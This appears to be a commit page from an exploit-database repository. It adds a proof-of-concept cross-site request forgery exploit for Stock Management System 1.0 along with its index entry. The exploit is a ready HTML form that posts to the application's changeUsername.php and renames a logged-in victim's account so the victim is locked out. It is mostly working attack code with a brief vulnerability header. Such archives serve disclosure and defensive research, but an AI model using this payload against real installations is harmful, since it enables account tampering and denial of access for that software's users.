DB: 2020-09-03
1 changes to exploits/shellcodes Stock Management System 1.0 - Cross-Site Request Forgery (Change Username)
This commit is contained in:
parent
38929aaab6
commit
4784c1aeb4
2 changed files with 29 additions and 0 deletions
28
exploits/php/webapps/48783.txt
Normal file
28
exploits/php/webapps/48783.txt
Normal file
|
@ -0,0 +1,28 @@
|
|||
# Exploit Title: Stock Management System 1.0 - Cross-Site Request Forgery (Change Username)
|
||||
# Exploit Author: Bobby Cooke & Adeeb Shah (@hyd3sec)
|
||||
# CVE ID: N/A
|
||||
# Date: 2020-09-01
|
||||
# Vendor Homepage: https://www.sourcecodester.com/php/14366/stock-management-system-php.html
|
||||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/stock.zip
|
||||
# Version: 1.0
|
||||
# Tested On: Windows 10 Pro + XAMPP | Python 2.7
|
||||
# CWE-352: Cross-Site Request Forgery (CSRF)
|
||||
# CVSS Base Score: 5.9 | Impact Subscore: 4.2 | Exploitability Subscore: 1.6
|
||||
# CVSS Vector: AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:H
|
||||
# Vulnerability Description:
|
||||
# Cross-Site Request Forgery (CSRF) vulnerability in 'changeUsername.php' webpage of SourceCodesters
|
||||
# Stock Management System v1.0 allows remote attackers to deny future logins via changing the
|
||||
# authenticated victims username when they visit a third-party site.
|
||||
|
||||
|
||||
# PoC - Form Method
|
||||
# Change <TARGET-HOST> to target IP address or hostname
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://<TARGET-HOST>/stock/php_action/changeUsername.php" method="POST">
|
||||
<input type="hidden" name="username" value="BOKU" />
|
||||
<input type="hidden" name="user_id" value="1" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
|
@ -43020,3 +43020,4 @@ id,file,description,date,author,type,platform,port
|
|||
48779,exploits/php/webapps/48779.py,"CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated)",2020-08-31,"Luis Noriega",webapps,php,
|
||||
48780,exploits/php/webapps/48780.txt,"Mara CMS 7.5 - Remote Code Execution (Authenticated)",2020-09-01,0blio_,webapps,php,
|
||||
48781,exploits/php/webapps/48781.txt,"moziloCMS 2.0 - Persistent Cross-Site Scripting (Authenticated)",2020-09-01,"Abdulkadir Kaya",webapps,php,
|
||||
48783,exploits/php/webapps/48783.txt,"Stock Management System 1.0 - Cross-Site Request Forgery (Change Username)",2020-09-02,boku,webapps,php,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue